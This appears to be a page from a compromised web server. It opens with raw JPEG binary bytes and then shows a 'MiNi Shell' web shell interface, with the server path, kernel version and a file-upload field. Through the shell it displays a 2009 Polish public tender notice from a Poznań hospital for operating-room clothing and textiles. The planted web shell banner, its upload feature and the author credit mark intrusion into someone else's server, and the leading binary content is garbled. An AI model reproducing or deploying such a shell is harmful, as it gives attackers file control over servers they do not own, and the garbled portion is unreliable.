JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090703/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090703/104503-N-2009.html

<p class="kh_header"><b>Poznań: zakup (dostawa) odzieży operacyjnej dla wszystkich  bloków operacyjnych szpitala.</b><br>
<b>Numer ogłoszenia: 104503 - 2009; data zamieszczenia: 03.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Kliniczny  Nr 1 Przemienienia Pańskiego Akademii Medycznej , ul. Długa 1/2, 61-848 Poznań, woj. wielkopolskie, tel. 061 854-90-00, faks 061 852-94-72.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sk1.am.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zakup (dostawa) odzieży operacyjnej dla wszystkich  bloków operacyjnych szpitala..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> zakup (dostawa) odzieży operacyjnej dla wszystkich  bloków operacyjnych szpitala..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 18.11.10.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie wymaga<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie  zamówienia ubiegać sie mogą Wykonawcy, którzy spełniają warunki, o których mowa w art.22 ust.1 Pzp
 -posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
-posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
-znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
-nie podlegają wykluczeniu z postępowania o udzielenie zamówienia
Zamawiający dokonuje oceny spełnienia warunków przez Wykonawcę na podstawie przedłożonych przez wykonawcę w ofercie dokumentów i oświadczeń wymienionych w SIWZ cz II, pkt 2.
Zamawiający oceni wykonawcę na zasadzie spełnia/nie spełnia. Wykonawca, który nie spełni warunków zostanie wykluczony. 
Wykonawcy mogą ubiegaącćie o udzielenie zamówienia również na podstawie art. 23.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca, który ubiega się o udzielenie zamówienia musi spełnić warunki określone w art. 22 ust 1  ustawy Pzp. Na potwierdzenie spełnienia warunków, o których mowa w art. 22 ust. 1 Wykonawca dołączy do oferty  oświadczenie o spełnieniu tych warunków, zgodnie z załącznikiem nr 3 do SIWZ.O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy nie podlegają wykluczeniu z postępowania o udzielanie zamówienia na podstawie art. 24  ustawy Pzp.W celu potwierdzenia spełnienia tego warunku Wykonawca dołączy do oferty niżej wymienione dokumenty:a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji   działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, b) w przypadku, gdy Wykonawcy będą ubiegać się wspólnie o zamówienie publiczne ustanawiają pełnomocnika do reprezentowania ich w postępowaniu, zgodnie z art. 23 ust. 2. Pełnomocnictwo  dołączyć do oferty. 
 Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia, na podstawie art. 23 ust. 1, potwierdzą spełnienie warunków wymienionych powyżej poprzez złożenie przez każdego  Wykonawcę dokumentów wyżej wymienionych w pkt 2).Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej  zamiast dokumentów, o których mowa w pkt 2.2) lit.a, składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania,  potwierdzający odpowiednio, że:  nie otwarto jego likwidacji ani nie ogłoszono upadłości.Dokument, o których mowa w pkt. 2.2) lit. a powinien być wystawiony nie wcześniej niż 6 
miesięcy    przed upływem terminu składania ofert.  Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce  zamieszkania, nie wydaje się dokumentu, o których mowa w SIWZ cz. II pkt 2.2) lit. a, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania
Zamawiający ponadto żąda dołączenia do oferty:
1)	ważnego dokumentu dopuszczającego tkaninę, z której wykonana będzie  odzież operacyjna do obrotu w kraju -zgodnie z obowiązującym prawem (np. CE lub zgłoszenie do rejestru wyrobów medycznych oznaczonych znakiem CE dla którego wystawiono deklarację zgodności). Dokument musi być w języku polskim lub przetłumaczony na język polski. Zamawiający prosi o zaznaczenie, którego pakietu i której pozycji dotyczy dokument.
2)Wykonawca   dołączy    do    oferty    opis  przedmiotu zmówienia w  języku polskim  w którym     należy  określić : rodzaj   tkaniny,  zastosowanie nici,  napy.  Ponadto należy dołączyć foldery   lub    zdjęcia      proponowanego     wzoru  odzieży.   W    przypadku    dołączenia     katalogu  zawierającego więcej niż proponowany wzór, należy wskazać ten zaproponowany.
3)Wykonawca dołączy do oferty atest(certyfikat)  producenta na tkaninę , nici i napy  wymienione w tabeli w języku polskim zgodnie z obowiązującą normą PN.
4)  Wykonawca zobowiązany jest dołączyć do oferty wypełniony Formularz ofertowy stanowiący załącznik nr 2 do SIWZ. Wykonawca w formularzu ofertowym uwzględni wszystkie elementy wymienione przez Zamawiającego w załączniku nr 2 do SIWZ.
5)  Zamawiający na podstawie art. 36 ust. 4 żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie zamierza powierzyć podwykonawcom 
( w przypadku, gdy zachodzi taka sytuacja - dokument dołączyć do oferty przetargowej)        
W przypadku, gdy wykonawcę reprezentuje pełnomocnik, do oferty należy dołączyć pełnomocnictwo z którego wynika zakres umocowania, podpisane przez osoby uprawnione do reprezentowania wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sk1.am.poznan.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Kliniczny Przemienienia Pańskiego Uniewersytetu Medycznego im.Karola Marcinkowskiego w Poznaniu ul.Długa 1/2 61-848 Poznań Dział Zamówień Publicznych pokój 603..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2009 godzina 09:30, miejsce: Szpital Kliniczny Przemienienia Pańskiego Uniewersytetu Medycznego im.Karola Marcinkowskiego w Poznaniu ul.Długa 1/2 61-848 Poznań Dział Zamówień Publicznych pokój 603..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Termin dostawy przez Wykonawcę ustalony w § 3 może zostać przedłużony:
a)  w przypadku zaistnienia siły wyższej  (ogień,  uderzenie pioruna,  eksplozja,  klęska żywiołowa, strajk,   deszcz nawalny i inne),
 b)   w przypadku braku w dostawach potwierdzonych pismem  od producenta  z  przyczyn za które   ponosi on odpowiedzialność.
2. O przypadku zaistnienia przyczyny określonej w ust.1 Wykonawca poinformuje niezwłocznie Zamawiającego, nie później jednak niż w terminie 3 dni od dnia zaistnienia powyższych przyczyn, wyznaczając nowy termin dostawy.
3.  W przypadku braku pisemnej informacji, o której mowa w ust. 2  ze strony Wykonawcy, Wykonawca wyraża zgodę na obciążenie go karami gwarancyjnymi zgodnie z zapisem § 12.
4. W przypadku możliwości zaistnienia braku w dostawach wynikających bezpośrednio z winy producenta/wytwórcy Wykonawca zobowiązany jest do pisemnego, natychmiastowego poinformowania o tym fakcie Zamawiającego w terminie do 2 dni celem uzgodnienia dalszej realizacji przedmiotu umowy.   
Zamawiający dopuszcza zmianę postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy oraz postanowień umowy zawartej w drodze negocjacji w następujących przypadkach i na określonych warunkach:
1.	Zmiany korzystne dla Zamawiającego:
a)	dopuszczalne jest obniżenie wynagrodzenia wykonawcy przy zachowaniu zakresu jego świadczenia umownego, na wniosek wykonawcy,
b)	dopuszczalne jest skrócenie terminu wykonania umowy,
c)	dopuszczalna jest zmiana świadczenia wykonawcy na lepszej jakości przy zachowaniu tożsamości przedmiotu świadczenia,
2.	Zmiany niekorzystne dla Zamawiającego:
a)	dopuszczalne jest zwiększenie wynagrodzenia wykonawcy w przypadku zmiany przez Narodowy Bank Polski kursu złotego w stosunku do waluty importera przedmiotu świadczenia powyżej 5% w stosunku do kursu z dnia zawarcia umowy, zmiany stawki podatku od towarów i usług lub akcyzowego na przedmiot świadczenia i zmiany cen urzędowych przedmiotu świadczenia.
b)	dopuszczalne jest wydłużenie terminu wykonania umowy z powodu siły wyższej albo z powodu okoliczności, za które wyłączną winę ponosi zamawiający,
c)	inne niekorzystne dla zamawiającego zmiany umowy dopuszczalne są tylko jeżeli z powodu nadzwyczajnej zmiany stosunków spełnienie świadczenia przez wykonawcę byłoby połączone z nadmiernymi trudnościami albo groziłoby mu rażącą stratą, czego nie przewidywały on przy zawarciu umowy.
3.	Zmiany neutralne dla zamawiającego:
a)	dopuszczalna jest zmiana umowy polegająca na zmianie danych wykonawcy bez zmian samego wykonawcy (np. zmiana siedziby, adresu, nazwy),
b)	dopuszczalna jest zmiana nazwy, określenia, oznaczenia przedmiotu świadczenia wykonawcy przy zachowaniu tożsamości świadczenia i jego jakości,
c)	dopuszczalne jest wydłużenie czasu trwania umowy w sytuacji niewykorzystania przez zamawiającego przedmiotu umowy przy zachowaniu jej wartości.
Zmiana postanowień zawartej umowy wymaga, pod rygorem nieważności, zachowania formy pisemnej, chyba że przepisy odrębne wymagają formy szczególnej. Zmiana umowy na wniosek wykonawcy wymaga wykazania okoliczności uprawniających do dokonania tej zmiany. 
Każda zmiana do umowy wymaga pisemnej zgody Zamawiającego..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zakup (dostawa) odzieży operacyjnej dla wszystkich bloków operacyjnych szpitala..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Bluza operacyjna męska i damska (zielona, niebieska, biała) krótki rękaw - 550 szt.
2.Spodnie operacyjne damskie i męskie (zielone, niebieskie, białe) - 550 szt.
3.Spódnica operacyjna (zielona, niebieska,biała)  -10 szt.
4.Sukienka operacyjna) zielona, niebieska i biała) - wycięcie przy szyi uzgodnić z użytkownikiem przy realizacji  zamówienia - 100 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.11.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zakup (dostawa) odzieży operacyjnej dla wszystkich bloków operacyjnych szpitala..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Prześcieradło operacyjne zielone , niebieskie,białe -500 szt.
2.Serweta operacyjna zielona , niebieska i biała - łączna ilość  1100 szt.
3.Serweta operacyjna  z otworem niebieska, zielona ,biała- 40 szt.
4.Serweta operacyjna z otworem z trokami - niebieska zielona,biała - 30 szt.
5.Serweta operacyjna  z otworem - niebieska,zielona,biała -30 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.11.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> zakup (dostawa) odzieży operacyjnej dla wszystkich bloków operacyjnych szpitala..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Koszule operacyjne białe , rękaw do łokcia, kimonowy wszywany kwadratowo, rozpinana z przodu na całej długości, napy na całej długości - 60 szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.11.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> zakup (dostawa) odzieży operacyjnej dla wszystkich bloków operacyjnych szpitala..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Fartuch operacyjny wiązany na plecach zielony i niebieski, rękaw ze ściągaczem białym - 450 szt.
2.Fartuch operacyjny, zakrywający plecy wiązany z przodu lub z boku rękaw ze ściągaczem białym - 50 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.11.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> zakup (dostawa) odzieży operacyjnej dla wszystkich bloków operacyjnych szpitala..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Worki na stoliki - 20 szt.
2.Worki na gaziki - 10 szt.
3.Worki na łyżki do defibrylacji - 15 szt.
4.Worki na elektrody + ssawka tzw. majtki- 25 szt.
5.Kołnierze do zastawek - 30 szt.
6.Pokrowce na fotele na boki - 15 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.11.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> zakup (dostawa) odzieży operacyjnej dla wszystkich bloków operacyjnych szpitala..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Fartuch operacyjny wielokrotnego  użytku wykonany na bazie 100% poliestrowej , barierowej nieteflonowej , oddychającej tkaniny    posiadającej antystatyczną nitkę węglową zapewniającą nie elektryzowanie się  fartucha podczas użytkowania - zgodnie z normą  PN-EN 13795, szew łączący poszczególne elementy tkaniny powinien być zakryty, zawijany ,dwuigłowy, stebnowany, wiązany z tyłu na troki - poły zakładane na siebie, rękawy wykończone ściągaczem ( mankietem białym) nie ulegającym zniekształceniu po praniu, suszeniu i sterylizacji  ( zielony i niebieski ) , rozm M-XL   -120 szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.11.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com